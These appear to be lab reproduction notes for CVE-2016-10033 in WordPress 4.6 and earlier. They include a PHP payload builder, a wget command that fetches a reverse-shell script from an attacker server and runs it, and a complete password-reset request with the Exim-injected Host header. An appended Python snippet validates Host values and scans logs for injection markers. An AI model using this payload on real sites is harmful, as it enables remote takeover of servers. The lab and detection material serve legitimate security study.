WordPress
1. Vulnerability reproduction
CVE-2016-10033 (vulhub pwnscriptum)
Affected versions: WordPress <= 4.6
Visit http://IP/wp-admin/install.php to complete the installation
Generate the payload with a PHP script:
<?php
$shell1 = '/usr/bin/wget --output-document /tmp/shell YOUR-SERVER-IP/shell.txt'; // download the reverse shell script
$shell2 = '/bin/bash /tmp/shell'; // run the script
// '/' and ' ' are rebuilt from Exim string expansions so the value still passes the mailer's address check
$shell1 = str_replace('/', '${substr{0}{1}{$spool_directory}}', str_replace(' ', '${substr{10}{1}{$tod_log}}', $shell1));
$shell2 = str_replace('/', '${substr{0}{1}{$spool_directory}}', str_replace(' ', '${substr{10}{1}{$tod_log}}', $shell2));
echo 'target(any -froot@localhost -be ${run{' . $shell1 . '}} null)<br><br>';
echo 'target(any -froot@localhost -be ${run{' . $shell2 . '}} null)';
Open the forgot-password page at /wp-login.php?action=lostpassword
Start an nc listener first, then set the Host header to the payload to get the reverse shell:
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close

user_login=admin&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81
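As an added defender-side example that is not part of the original reproduction notes: this Python snippet applies the check that stops this bug class (a Host value must be a plain hostname before it may become the sender address) and flags the Exim expansion markers seen above in a few constructed request log lines. The log format, the marker list and the sample lines are assumptions made for the example.

```python
import re

# Strict RFC 1123 hostname with optional :port. A Host value that fails this
# must never reach the From address (wordpress@<host>) that PHPMailer passes
# to sendmail -f, where Exim expands ${...} constructs.
_HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$", re.IGNORECASE)

# Exim expansion and sendmail-option fragments from the Host header above.
_INJECTION_MARKERS = ("${run{", "${substr{", "$spool_directory",
                      "$tod_log", " -be ", " -f")

def is_valid_host(host: str) -> bool:
    """True only for a plain hostname[:port] of at most 253 characters."""
    host = host.strip()
    return len(host.split(":")[0]) <= 253 and bool(_HOSTNAME_RE.match(host))

def classify_host(host: str) -> str:
    """'ok' for a clean hostname, 'exim-expansion' when the value carries
    the ${...} / sendmail-option markers of this CVE, otherwise 'invalid'."""
    if is_valid_host(host):
        return "ok"
    if any(marker in host for marker in _INJECTION_MARKERS):
        return "exim-expansion"
    return "invalid"

def scan_log(lines):
    """Return (line_no, verdict, host) for every non-'ok' Host value.
    Lines use a constructed '<ip> <method> <path> host=<value>' format."""
    findings = []
    for n, line in enumerate(lines, 1):
        host = line.split("host=", 1)[1] if "host=" in line else ""
        verdict = classify_host(host)
        if verdict != "ok":
            findings.append((n, verdict, host))
    return findings

# Constructed sample lines; line 3 mirrors the Host value used on this page.
SAMPLE_LOG = [
    "203.0.113.5 GET /wp-login.php host=blog.example.com",
    "203.0.113.5 POST /wp-login.php?action=lostpassword host=blog.example.com:443",
    "198.51.100.9 POST /wp-login.php?action=lostpassword host=target(any "
    "-froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin}} null)",
    "198.51.100.9 GET / host=evil.example.com<script>",
]
```

Wiring is_valid_host into the code path that builds the sender address (or replacing the Host-derived domain with the configured site URL) removes the injection point; scan_log is the retrospective check over existing request logs.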